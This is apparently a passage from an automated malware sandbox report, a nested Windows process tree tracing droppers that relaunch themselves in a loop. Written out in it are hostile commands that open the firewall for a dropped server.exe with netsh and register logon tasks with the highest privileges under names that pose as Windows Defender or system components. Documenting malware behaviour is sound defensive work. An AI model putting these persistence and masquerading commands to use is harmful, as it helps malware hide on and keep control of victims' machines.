                                                                  • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                    6⤵
                                                                    • Drops startup file
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in System32 directory
                                                                    • Drops file in Program Files directory
                                                                    PID:4248
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                      7⤵
                                                                      • Modifies Windows Firewall
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2672
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4832
                                                                      • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                        8⤵
                                                                        • Drops startup file
                                                                        • Executes dropped EXE
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4192
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                          9⤵
                                                                          • Modifies Windows Firewall
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3100
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3920
                                                                          • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                            10⤵
                                                                            • Drops startup file
                                                                            • Executes dropped EXE
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4084
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                              11⤵
                                                                              • Modifies Windows Firewall
                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                              PID:4500
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                              11⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2480
                                                                              • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                12⤵
                                                                                • Drops startup file
                                                                                • Executes dropped EXE
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Program Files directory
                                                                                PID:4388
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                  13⤵
                                                                                  • Modifies Windows Firewall
                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                  PID:2988
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                  13⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4924
                                                                                  • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                    14⤵
                                                                                    • Drops startup file
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2004
                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                      15⤵
                                                                                      • Modifies Windows Firewall
                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1888
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                      15⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4464
                                                                                      • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                        16⤵
                                                                                        • Drops startup file
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in System32 directory
                                                                                        • Drops file in Program Files directory
                                                                                        PID:1508
                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                          17⤵
                                                                                          • Modifies Windows Firewall
                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                          PID:2092
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                          17⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5084
                                                                                          • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                            18⤵
                                                                                            • Drops startup file
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            • Drops file in Program Files directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2608
                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                              netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                              19⤵
                                                                                              • Modifies Windows Firewall
                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3012
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                              19⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1548
                                                                                              • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                20⤵
                                                                                                • Drops startup file
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                • Drops file in Program Files directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2436
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                  21⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4460
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                  21⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3692
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                    22⤵
                                                                                                    • Drops startup file
                                                                                                    • Drops file in System32 directory
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:3400
                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                      23⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3088
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                      23⤵
                                                                                                        PID:1616
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                          24⤵
                                                                                                          • Drops startup file
                                                                                                          • Drops file in System32 directory
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:3432
                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                            25⤵
                                                                                                            • Modifies Windows Firewall
                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4944
                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                            25⤵
                                                                                                              PID:376
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                26⤵
                                                                                                                • Drops startup file
                                                                                                                • Drops file in System32 directory
                                                                                                                • Drops file in Program Files directory
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3568
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                  27⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                  PID:860
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                  27⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2020
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                    28⤵
                                                                                                                    • Drops startup file
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:1728
                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                      29⤵
                                                                                                                      • Modifies Windows Firewall
                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:4176
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                      29⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2620
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                        30⤵
                                                                                                                        • Drops startup file
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2772
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                          31⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          PID:4596
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                          31⤵
                                                                                                                            PID:4464
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                              32⤵
                                                                                                                                PID:4984
                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                  33⤵
                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                  PID:4376
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                  33⤵
                                                                                                                                    PID:2804
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                      34⤵
                                                                                                                                        PID:4100
                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                          35⤵
                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                          PID:3392
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                          35⤵
                                                                                                                                            PID:2372
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                              36⤵
                                                                                                                                                PID:2852
                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                                  37⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:836
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                                  37⤵
                                                                                                                                                    PID:1948
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                                      38⤵
                                                                                                                                                        PID:3256
                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Client.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Client.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in System32 directory
                                                                                  PID:4500
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                    4⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:3168
                                                                                  • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                    "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in System32 directory
                                                                                    PID:4520
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                      5⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:4504
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\csGMovlsCz1U.bat" "
                                                                                      5⤵
                                                                                        PID:1488
                                                                                        • C:\Windows\system32\chcp.com
                                                                                          chcp 65001
                                                                                          6⤵
                                                                                            PID:4036
                                                                                          • C:\Windows\system32\PING.EXE
                                                                                            ping -n 10 localhost
                                                                                            6⤵
                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                            • Runs ping.exe
                                                                                            PID:2004
                                                                                          • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                            "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            PID:2256
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                              7⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:5012
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat" "
                                                                                              7⤵
                                                                                                PID:2584
                                                                                                • C:\Windows\system32\chcp.com
                                                                                                  chcp 65001
                                                                                                  8⤵
                                                                                                    PID:4560
                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                    ping -n 10 localhost
                                                                                                    8⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:4592
                                                                                                  • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                    "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:3832
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                      9⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:4340
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat" "
                                                                                                      9⤵
                                                                                                        PID:4092
                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                          chcp 65001
                                                                                                          10⤵
                                                                                                            PID:3380
                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                            ping -n 10 localhost
                                                                                                            10⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:3436
                                                                                                          • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                            "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in System32 directory
                                                                                                            PID:1360
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                              11⤵
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:3488
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat" "
                                                                                                              11⤵
                                                                                                                PID:4196
                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                  chcp 65001
                                                                                                                  12⤵
                                                                                                                    PID:4556
                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                    ping -n 10 localhost
                                                                                                                    12⤵
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:3208
                                                                                                                  • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                    "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                    12⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:3080
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                      13⤵
                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                      PID:2728
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat" "
                                                                                                                      13⤵
                                                                                                                        PID:2824
                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                          chcp 65001
                                                                                                                          14⤵
                                                                                                                            PID:3032
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping -n 10 localhost
                                                                                                                            14⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:2392
                                                                                                                          • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                            "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                            14⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            PID:3280
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                              15⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:2084
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat" "
                                                                                                                              15⤵
                                                                                                                                PID:4012
                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                  chcp 65001
                                                                                                                                  16⤵
                                                                                                                                    PID:3404
                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                    ping -n 10 localhost
                                                                                                                                    16⤵
                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:3764
                                                                                                                                  • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                    "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                    16⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    PID:1300
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                      17⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:4940
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat" "
                                                                                                                                      17⤵
                                                                                                                                        PID:3316
                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          18⤵
                                                                                                                                            PID:4716
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping -n 10 localhost
                                                                                                                                            18⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:5112
                                                                                                                                          • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                            "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                            18⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            PID:2364
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                              19⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:3192
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat" "
                                                                                                                                              19⤵
                                                                                                                                                PID:2300
                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                  chcp 65001
                                                                                                                                                  20⤵
                                                                                                                                                    PID:1548
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping -n 10 localhost
                                                                                                                                                    20⤵
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:5004
                                                                                                                                                  • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                    "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                    20⤵
                                                                                                                                                      PID:1476
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                        21⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:3880
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat" "
                                                                                                                                                        21⤵
                                                                                                                                                          PID:3932
                                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                                            chcp 65001
                                                                                                                                                            22⤵
                                                                                                                                                              PID:876
                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                              ping -n 10 localhost
                                                                                                                                                              22⤵
                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:2592
                                                                                                                                                            • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                              "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                              22⤵
                                                                                                                                                                PID:792
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                  23⤵
                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                  PID:1204
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat" "
                                                                                                                                                                  23⤵
                                                                                                                                                                    PID:3380
                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                      chcp 65001
                                                                                                                                                                      24⤵
                                                                                                                                                                        PID:2632
                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                                        24⤵
                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:4640
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\jij.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\jij.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:3984
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\333.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:2044
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
                                                                                                                              3⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:888
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 1164
                                                                                                                                4⤵
                                                                                                                                • Program crash
                                                                                                                                PID:3304
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
                                                                                                                              3⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4396
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1172
                                                                                                                                4⤵
                                                                                                                                • Program crash
                                                                                                                                PID:3780
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
                                                                                                                              3⤵
                                                                                                                                PID:3160
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f
                                                                                                                                  4⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:3404
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
                                                                                                                                  4⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:1096
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3568
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
